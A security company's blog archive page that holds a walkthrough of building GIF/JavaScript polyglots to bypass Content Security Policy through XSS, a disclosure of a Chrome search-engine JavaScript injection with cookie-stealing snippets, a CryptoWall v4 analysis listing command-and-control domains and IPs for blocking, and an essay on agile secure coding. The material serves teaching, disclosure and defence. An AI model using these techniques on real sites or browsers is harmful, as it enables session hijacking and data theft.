[email protected]   +1 (833) 3COLONY / +61 1300 733 940

Monthly Archives: January 2018

Malicious Memes


The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?

Background

Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a certain set of whitelisted places. For example, a common implementation of the CSP header is to ensure the browser only accepts scripts that come from your domain and block the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). This CSP is a recommended security header to mitigate the damage caused by Cross-Site Scripting vulnerabilities. The header achieves this by narrowing the attack surface available for malicious scripts to be loaded from. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client side code into a web application and have it rendered in the browser as a part of the webpage. Usually caused by lack of (or poorly implemented) user input sanitation and encoding, attackers use XSS vulnerabilities to inject malicious JavaScript (JS) that can be used to hijack user’s sessions, modify content on the webpage, redirect the visitor to another website or ‘hook’ the victim’s browser. Browser hooking is an attack technique for leveraging XSS vulnerabilities in which the XSS is used to load scripts from a server operated by the attacker which grants greater control over the hooked browser’s behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. They are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser which in theory mitigates the dangers of a reflected XSS and protects the user.

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.

Polyglots

In humans, a ‘polyglot’ is someone who can speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from: http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data in between these represent each frame of a GIF image. At least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version represented as ‘87a’ or ‘89a’ in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD which informs the image decoder of properties that effect the whole image. Firstly, the canvas width and height values which are stored as unsigned 16-bit integers. A ’16-bit unsigned integer’ is a number between 0 and 65,535 that cannot be negative (It wouldn’t make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

It is also important to understand that this data in the GIF format is represented in ‘little-endian’ which means the least significant byte is read first by the decoder. In Figure 6 we can see the canvas size is set as width: ‘0A00’ and height: ‘0A00’. While seemingly backwards for humans, little-endian dictates the decoder read the smaller byte first, width: ‘000A’ and height: ‘000A’ which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is represented by hexadecimal ‘3B’ which when encoded as ASCII represents a semicolon.

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image

Most image decoders, including browsers, will ignore anything after the trailing semicolon making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image; data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw/unedited image after it’s uploaded to the server — see the ‘limitations’ section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

To create our malicious image, we are using a small, non-animated GIF image as seen in Figure 7. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is by manipulating the LSD to begin a JS comment block as seen in Figure 9. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to implement the ‘/*’ (begin comment block) JS command we have changed the value of the first two bytes of the LSD which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’ which when interpreted as little-endian by the image decoder is ‘2A 2F = 10799’. While we still have a valid GIF image, it has a pretty whacky canvas size as seen in the output below:

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try and execute the image as JS the engine reads the GIF header as a variable name, it ignores the comment block and then continues by setting the variable to equal ‘1’ which is just a dummy variable to ensure the JS syntax remains valid. Then our payload is executed.

The image passes standard image validation techniques used by web applications which often rely on confirming the ‘magic numbers’ (a fancier way of saying header) of the image. Once our image is uploaded to the server we effectively have a valid JS file originating from the web application’s domain which falls within the context of the CSP.

As it stands the image is loaded into to the web application through the use of the HTML ‘img’ tag which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with the HTML ‘script src’ tag.

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.

Limitations

  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited number of JS characters that can be used in the LSD the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server side image manipulation that resizes the image will edit the canvas size in the LSD; corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.

Conclusion

While Figure 14 demos a rather mundane script execution it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP same origin requirements.

This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing GIF/XSS polyglots are a powerful tool to leverage the consequence of improper output sanitation.

While still recommended, the CSP header should be implemented with the understanding that it’s the last line of defence against XSS attacks that might protect your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.


Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions from users, data provided by users should be sanitised and/or restricted to prevent malicious data from being entered. The malicious data consists of malicious code supplied to the browser as Javascript. Input sanitation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Combined with the fact that Google Chrome is the most popular web-browser with approx. 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to SettingsManage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
  3. Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but there’s some work on detection taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent;

The most reliable method to detect Cryptowall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems, or centralised log management servers is to create a rule to alert on creation of the following filenames, which are static within CryptoWall v4:

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts of productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
 
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWallv4. These are two known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun a6c784cb “C:UsersadminAppDataRoaminga6c784cb4ae38306a6.exe

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e.: HELP_MY_FILES.txt). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common and possibly biggest challenges when incorporating agility into security is the ability to effectively integrate security practices such as the use of Static Application Security Testing (SAST) tools in an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing. For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process that is in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as an improbable concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint